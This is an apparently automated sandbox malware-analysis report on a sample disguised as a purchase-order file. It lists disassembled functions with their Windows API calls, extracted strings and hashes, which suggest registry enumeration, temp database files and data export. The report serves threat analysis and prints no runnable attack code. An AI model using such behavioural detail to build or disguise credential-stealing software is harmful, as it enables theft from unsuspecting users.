                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 2029023288-3849865405
                                                              • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                              • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                              APIs
                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                              • memset.MSVCRT ref: 00405455
                                                              • memset.MSVCRT ref: 0040546C
                                                              • memset.MSVCRT ref: 00405483
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy$ErrorLast
                                                              • String ID: 6$\
                                                              • API String ID: 404372293-1284684873
                                                              • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                              • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                              • wcscpy.MSVCRT ref: 0040A107
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                              • String ID:
                                                              • API String ID: 1331804452-0
                                                              • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                              • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                              APIs
                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                              • String ID: advapi32.dll
                                                              • API String ID: 2012295524-4050573280
                                                              • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                              • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                              APIs
                                                              Strings
                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                              • <%s>, xrefs: 004100A6
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                              • API String ID: 3473751417-2880344631
                                                              • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                              • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset
                                                              • String ID: %2.2X
                                                              • API String ID: 2521778956-791839006
                                                              • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                              • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfwcscpy
                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                              • API String ID: 999028693-502967061
                                                              • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                              • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                              APIs
                                                              • strlen.MSVCRT ref: 00408DFA
                                                                • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                              • memset.MSVCRT ref: 00408E46
                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                              • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memsetstrlen
                                                              • String ID:
                                                              • API String ID: 2350177629-0
                                                              • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                              • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                              • API String ID: 2221118986-1606337402
                                                              • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                              • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                              APIs
                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                              • memset.MSVCRT ref: 00408FD4
                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                              • memset.MSVCRT ref: 00409042
                                                              • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                              • String ID:
                                                              • API String ID: 265355444-0
                                                              • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                              • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                              • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                              • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                              APIs
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                              • memset.MSVCRT ref: 0040C439
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                              • memset.MSVCRT ref: 0040C4D0
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                              • String ID:
                                                              • API String ID: 4131475296-0
                                                              • Opcode ID: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                              • Opcode Fuzzy Hash: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                              APIs
                                                              • memset.MSVCRT ref: 004116FF
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 2618321458-3614832568
                                                              • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                              • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AttributesFilefreememset
                                                              • String ID:
                                                              • API String ID: 2507021081-0
                                                              • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                              • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                              • malloc.MSVCRT ref: 00417524
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                              • free.MSVCRT ref: 00417544
                                                              • free.MSVCRT ref: 00417562
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                              • String ID:
                                                              • API String ID: 4131324427-0
                                                              • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                              • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                              APIs
                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                              • free.MSVCRT ref: 0041822B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: PathTemp$free
                                                              • String ID: %s\etilqs_$etilqs_
                                                              • API String ID: 924794160-1420421710
                                                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                              APIs
                                                              • memset.MSVCRT ref: 0040FDD5
                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                              • API String ID: 1775345501-2769808009
                                                              • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                              • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                              APIs
                                                              • wcscpy.MSVCRT ref: 0041477F
                                                              • wcscpy.MSVCRT ref: 0041479A
                                                              • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                              • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$CloseCreateFileHandle
                                                              • String ID: General
                                                              • API String ID: 999786162-26480598
